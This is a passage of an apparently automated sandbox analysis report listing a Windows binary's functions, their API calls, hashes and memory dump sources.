                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2931989736-0
                                                                                                                                                                                                                                  • Opcode ID: 2fdfb682980512742a695b77e81ad400911ff4677cd7e04bd499d6e8e9de8e65
                                                                                                                                                                                                                                  • Instruction ID: f37eea06dd5fd6d1df0ad3126449b9ff4bd61285fe5dece26b31d32b58cb7d57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fdfb682980512742a695b77e81ad400911ff4677cd7e04bd499d6e8e9de8e65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1401B5A160430D7BD61456229DA2FFB735DAE517A8F284821FE059B641EF61ED10C3A1
                                                                                                                                                                                                                                  Function 009C316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000000A,?,?,009BF64E,009B545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C3170
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C31A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C31CC
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C31D9
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C31E2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: ea8db3bed817063b9e53675add5e86f99bd8c600f85d63cac68e2a9014f1dd42
                                                                                                                                                                                                                                  • Instruction ID: f21001ccd3eb7423c13c2b5795ad564cfb6c15412d0a7ab51a631cdd532d06d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea8db3bed817063b9e53675add5e86f99bd8c600f85d63cac68e2a9014f1dd42
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7301A972E48A006FA622A774DC89F6B156DABD53B1728C53CF81592192EF25CB034353
                                                                                                                                                                                                                                  Function 009F08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?,?,009F0C4E), ref: 009F091B
                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0936
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0944
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?), ref: 009F0954
                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0960
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                                                                                                  • Opcode ID: efade4d4e5b030e562eadaeba4cd9b12cc3219a8e7d3c4c1e1d2aa0f9069270c
                                                                                                                                                                                                                                  • Instruction ID: a40b84b2be29ad48db5067badd9614765eb2ce8b3baaf4fe7fcba9510af4742f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efade4d4e5b030e562eadaeba4cd9b12cc3219a8e7d3c4c1e1d2aa0f9069270c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE018472600208AFEB108FA9DC44BBA7BEDEB84795F140124FE05D6113E7B1DD829760
                                                                                                                                                                                                                                  Function 009F1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                                                                                                  • Opcode ID: b6d92f11bb7e1b1492a81490dca56afde9d53d97cba0471a51749e616995fe81
                                                                                                                                                                                                                                  • Instruction ID: 605ef56be3f0aa4c7d4a6a93533bceb0328fc1cd11880232b2651f10c26d22ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6d92f11bb7e1b1492a81490dca56afde9d53d97cba0471a51749e616995fe81
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D80181B5601605FFDB218FA8DC49D7A3B6DEF84364F210424F945C7260DB31DC428A60
                                                                                                                                                                                                                                  Function 009F1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009F1916
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009F1922
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009F1931
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009F1938
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009F194E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                  • Opcode ID: 88f7fe36968d54021debaab0f712fda5e6581e71ef63801dfe44f11b275ed573
                                                                                                                                                                                                                                  • Instruction ID: a478dd27052612e4c439d49d5af43653fed6b9252efb58d83387d243f822e6e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88f7fe36968d54021debaab0f712fda5e6581e71ef63801dfe44f11b275ed573
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F06275100305ABDB214FA9EC4DF663BADEF897A0F100424FA45D7261CB70DC528BA0
                                                                                                                                                                                                                                  Function 009F1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009F1976
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009F1982
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009F1991
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009F1998
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009F19AE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                  • Opcode ID: 39982ba48086881bd80b2f7ad17e3da9dd55f9ed3effe739baadfa78efc5e1c5
                                                                                                                                                                                                                                  • Instruction ID: 45e12b2f876c4a9d2feaa3e438f1085c188fa1fe8b993fe696c11210832efdbf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39982ba48086881bd80b2f7ad17e3da9dd55f9ed3effe739baadfa78efc5e1c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2F06275100305ABD7218FA9EC59F663B6DEF897A0F100524FA45C7261CB70D9928BA0
                                                                                                                                                                                                                                  Function 00A00CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CCB
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CD8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CE5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CF2
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CFF
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00D0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: e5a1802ce1056dd06e0b52e8077b37cea262a7d7a878dd86d766f8a6caed00b5
                                                                                                                                                                                                                                  • Instruction ID: c636b606e597dcff53a034fe7b6e540f6b402b38263ceee1e6f9ec66b50caa0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5a1802ce1056dd06e0b52e8077b37cea262a7d7a878dd86d766f8a6caed00b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801DC71800B099FCB30AFAAE880912FAF9BE603157108A3FD19252961C7B0A859CE80
                                                                                                                                                                                                                                  Function 009F65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009F65BF
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 009F65D6
                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 009F65EE
                                                                                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 009F660A
                                                                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 009F6624
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                                                                                  • Opcode ID: 674ae7ca1c15a11ddfdb92978cf239afb4280010cbc102a686ef0ca063b036a0
                                                                                                                                                                                                                                  • Instruction ID: 10d6e166ec3cbadc31f9cff95b4542779e41abed09f4b62b640337d45cd8a336
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 674ae7ca1c15a11ddfdb92978cf239afb4280010cbc102a686ef0ca063b036a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35016230510308ABEB309B54DD4EBB67BBCFB00705F000569B286A14E1DBE4AA46CB50
                                                                                                                                                                                                                                  Function 009CDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAD2
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAE4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAF6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDB08
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDB1A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: f11c08c8ca9ee9ff4c5f4d7207a2f3f9b527a7c8b3477f9cac2484fa2b31d8fd
                                                                                                                                                                                                                                  • Instruction ID: cc25078100b9c6d3e3f29f00925d0cd7ed8f9d61966664fcf3eb566dd0dca30d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f11c08c8ca9ee9ff4c5f4d7207a2f3f9b527a7c8b3477f9cac2484fa2b31d8fd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F01D72D46305AB8624EBA8F982F1A77EDFE587117A50C1DF00AD7941CB30FCC08A66
                                                                                                                                                                                                                                  Function 009C2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C262E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2640
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2653
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2664
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2675
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 07793d17cca124813788a9a32ee60fae454e2117a99bc41f5d226befadcacf5a
                                                                                                                                                                                                                                  • Instruction ID: fd94356f4c663de7c36a472618e6abafc4e9a9e33e3dfc09a319392718d45554
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07793d17cca124813788a9a32ee60fae454e2117a99bc41f5d226befadcacf5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0DA70C416209B8612EFE8EC11F883B78FB68B51315094FF415D62B5CBB14983AF96
                                                                                                                                                                                                                                  Function 009C12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __freea$_free
                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                  • Opcode ID: 009f6ca3012e8d297082b769fa9bfe4a395f57dace593d2d14c2fc3d38798f56
                                                                                                                                                                                                                                  • Instruction ID: 5fb900cb1fd8e951c9461b968a41bd8ed3e93fac390331cc5088af41bcd15a9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 009f6ca3012e8d297082b769fa9bfe4a395f57dace593d2d14c2fc3d38798f56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D10371D10246DBDB289F68C995FBAB7B9FF47300F28415EE4029B262D3358D40CB9A
                                                                                                                                                                                                                                  Function 009F3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F2B1D,?,?,00000034,00000800,?,00000034), ref: 009FBDF4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009F30AD
                                                                                                                                                                                                                                    • Part of subcall function 009FBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 009FBDBF
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 009FBD1C
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 009FBD2C
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 009FBD42
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009F311A
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009F3167
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
